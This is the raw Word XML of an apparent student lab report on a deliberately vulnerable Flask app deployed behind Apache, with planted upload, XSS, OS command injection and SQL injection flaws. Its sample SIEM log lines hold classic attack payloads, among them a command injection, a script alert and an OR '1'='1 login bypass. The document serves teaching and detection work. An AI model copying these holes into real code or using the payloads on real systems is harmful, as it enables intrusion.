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03696973"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="1FD7F6CD" w14:textId="7D0B75E8" w:rsidR="00B72A92" w:rsidRDefault="00B72A9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B23D902" wp14:editId="694906F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oup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884141857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800BB0A" w14:textId="4680D85A" w:rsidR="00B72A92" w:rsidRDefault="00B72A92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p w14:paraId="2F145E47" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00000000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922067218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B72A92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[Company name]</w:t>
                                      </w:r>
                                    </w:sdtContent>
                                  </w:sdt>
                                  <w:r w:rsidR="00B72A92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2113163453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B72A92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[Company address]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itle"/>
                                    <w:tag w:val=""/>
                                    <w:id w:val="-1476986296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F942710" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00B72A92">
                                      <w:pPr>
                                        <w:pStyle w:val="NoSpacing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[Document title]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0E2841" w:themeColor="text2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57346227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41AB58F8" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00B72A92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>[Document subtitle]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B23D902" id="Group 121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">
                    <v:rect id="Rectangle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156082 [3204]" stroked="f" strokeweight="1.5pt"/>
                    <v:rect id="Rectangle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e97132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88414185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800BB0A" w14:textId="4680D85A" w:rsidR="00B72A92" w:rsidRDefault="00B72A92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2F145E47" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00000000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922067218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B72A92">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  </w:rPr>
                                  <w:t>[Company name]</w:t>
                                </w:r>
                              </w:sdtContent>
                            </w:sdt>
                            <w:r w:rsidR="00B72A92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2113163453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B72A92">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  </w:rPr>
                                  <w:t>[Company address]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itle"/>
                              <w:tag w:val=""/>
                              <w:id w:val="-1476986296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F942710" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00B72A92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[Document title]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0E2841" w:themeColor="text2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5734622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41AB58F8" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00B72A92">
                                <w:pPr>
                                  <w:pStyle w:val="NoSpacing"/>
                                  <w:spacing w:before="240"/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[Document subtitle]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524FDD8" w14:textId="38FF46C2" w:rsidR="00B72A92" w:rsidRDefault="00B72A92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362300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F1B5D18" w14:textId="7CED7507" w:rsidR="00B72A92" w:rsidRDefault="00B72A92">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="77CF2B5F" w14:textId="1A5D009E" w:rsidR="00B72A92" w:rsidRDefault="00B72A92">
          <w:fldSimple w:instr=" TOC \o &quot;1-3&quot; \h \z \u ">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>No table of contents entries found.</w:t>
            </w:r>
          </w:fldSimple>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7D3B04E8" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00B72A92" w:rsidP="00394DC9"/>
    <w:p w14:paraId="72D34AB0" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00B72A92">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D343B99" w14:textId="5C383197" w:rsidR="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0089361D" w:rsidRPr="0089361D">
        <w:t>System Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D325F5" w14:textId="77777777" w:rsidR="0089361D" w:rsidRDefault="0089361D" w:rsidP="0089361D">
      <w:r>
        <w:t>Python Version: Python 3.14.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463EF44" w14:textId="77777777" w:rsidR="0089361D" w:rsidRDefault="0089361D" w:rsidP="0089361D">
      <w:r>
        <w:t>Flask Version: Flask 3.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7F993A" w14:textId="61A7E295" w:rsidR="0089361D" w:rsidRPr="00394DC9" w:rsidRDefault="0089361D" w:rsidP="0089361D">
      <w:r>
        <w:t>Git Status: Repository initialized on VM1 (Initial commit recorded).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF2171" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>Versions :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3612C31E" w14:textId="38DADFCB" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B74D0B" wp14:editId="32E290D4">
            <wp:extent cx="5943600" cy="1767840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="66321116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4324A" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="4F99F2EF" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>Directory :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6009A18D" w14:textId="1930506F" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01136881" wp14:editId="08D2C731">
            <wp:extent cx="5943600" cy="1767840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="123375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7792F" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="2440ED8C" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">Git </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E5D5DE" w14:textId="4481CE65" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="609CD79B" wp14:editId="5A1075BE">
            <wp:extent cx="5943600" cy="1729740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="165391475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AA6D3" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="17EECC30" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="3F1C179E" w14:textId="17E0A778" w:rsidR="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD5AE9" w:rsidRPr="00CD5AE9">
        <w:t>Vulnerability Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C5A65" w14:textId="77777777" w:rsidR="00CD5AE9" w:rsidRDefault="00CD5AE9" w:rsidP="00CD5AE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>File Upload: Disguised in /profile (Avatar Upload). Files stored in static/uploads/ without extension validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E444DF6" w14:textId="77777777" w:rsidR="00CD5AE9" w:rsidRDefault="00CD5AE9" w:rsidP="00CD5AE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Reflected XSS: Disguised in /search (Knowledge Base Search). Search query rendered without HTML escaping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F4F912" w14:textId="77777777" w:rsidR="00CD5AE9" w:rsidRDefault="00CD5AE9" w:rsidP="00CD5AE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Stored XSS: Disguised in /feedback (Community Board). Comments stored and displayed unescaped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3754C8F1" w14:textId="77777777" w:rsidR="00CD5AE9" w:rsidRDefault="00CD5AE9" w:rsidP="00CD5AE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OS Command Injection: Disguised in /admin/tools (Server Diagnostic Ping Tool). Shell string concatenation passed to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>subprocess.getoutput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB1309" w14:textId="124334FF" w:rsidR="00CD5AE9" w:rsidRPr="00394DC9" w:rsidRDefault="00CD5AE9" w:rsidP="00CD5AE9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection: Disguised in /directory &amp; /login (Employee Search and Auth). SQLite queries formatted with raw string inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C2DB7F" w14:textId="6EB17B29" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C083EBB" wp14:editId="1CB1DE7F">
            <wp:extent cx="5943600" cy="3040380"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="6146990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B5B78" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="12A0FD9D" w14:textId="73FDAB79" w:rsidR="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>3 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD5AE9" w:rsidRPr="00CD5AE9">
        <w:t>Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA257D" w14:textId="77777777" w:rsidR="00CD5AE9" w:rsidRDefault="00CD5AE9" w:rsidP="00CD5AE9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> App Command: python3 app.py &amp; (Port 5000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0245FA2B" w14:textId="6D3D0858" w:rsidR="00CD5AE9" w:rsidRPr="00394DC9" w:rsidRDefault="00CD5AE9" w:rsidP="00CD5AE9">
      <w:r>
        <w:t>Apache Web Server: Proxying Port 80 -&gt; Port 5000 (http://&lt;VM1-IP&gt;/)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E1C8B" w14:textId="52D32944" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="635B870A" wp14:editId="1FA9DEC0">
            <wp:extent cx="5943600" cy="3451860"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2594501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9D64B" w14:textId="6239EF61" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49587541" wp14:editId="41FBFFE8">
            <wp:extent cx="5943600" cy="2731770"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="205742758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EADE6" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="7212224C" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t>Step 4: logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBAC455" w14:textId="3A905BE8" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61972AA8" wp14:editId="0CC3473B">
            <wp:extent cx="4099560" cy="3672840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="8018766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ABB22" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="0AB9E16B" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log File Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18098616" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t>/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>omar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>masar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>final_Project</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>/app_access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4069C705" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="3504DA2B" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SIEM Log Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163264D0" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t>Every HTTP request generates a structured log line formatted as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26523417" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="3AA5167F" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">YYYY-MM-DD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HH:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MM:SS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> | INFO | CLIENT_IP=&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt; | METHOD=&lt;method&gt; | PATH=&lt;path&gt; | QUERY=&lt;query&gt; | BODY=&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>body_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt; | AGENT="&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>user_agent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5CCC31" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t>Sample Log Entries Generated During Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05126DA3" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File Upload Log Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F04C707" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2026-09-07 18:15:00,123 | INFO | CLIENT_IP=192.168.1.50 | METHOD=POST | PATH=/profile | QUERY= | BODY=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FilesUploaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: ['webshell.py'] | AGENT="Mozilla/5.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655435F3" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Injection Log Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6A662" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2026-09-07 18:16:10,456 | INFO | CLIENT_IP=192.168.1.50 | METHOD=POST | PATH=/admin/tools | QUERY= | BODY</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">'host': '127.0.0.1; id; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -a'} | AGENT="Mozilla/5.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1649E827" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS Log Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5BDEE2" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2026-09-07 18:17:20,789 | INFO | CLIENT_IP=192.168.1.50 | METHOD=GET | PATH=/search | QUERY=q=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E | BODY= | AGENT="Mozilla/5.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B825F37" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection Log Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338B9606" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2026-09-07 18:18:30,912 | INFO | CLIENT_IP=192.168.1.50 | METHOD=POST | PATH=/login | QUERY= | BODY</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'username': "admin' OR '1'='1", 'password': 'foo'} | AGENT="Mozilla/5.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07443E" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9"/>
    <w:p w14:paraId="6AD1ACC0" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="0089361D" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0089361D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5: Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DD44BA" w14:textId="77777777" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve">Enable proxy modules in Apache and creating the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t>VirtualHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00394DC9">
        <w:t xml:space="preserve"> configuration file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA25A87" w14:textId="1F7B805D" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4C6C62" wp14:editId="50CB39F6">
            <wp:extent cx="3048000" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163572408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7C769" w14:textId="57E22BD1" w:rsidR="00394DC9" w:rsidRPr="00394DC9" w:rsidRDefault="00394DC9" w:rsidP="00394DC9">
      <w:r w:rsidRPr="00394DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E6E762" wp14:editId="1254BCF8">
            <wp:extent cx="3924300" cy="1280160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
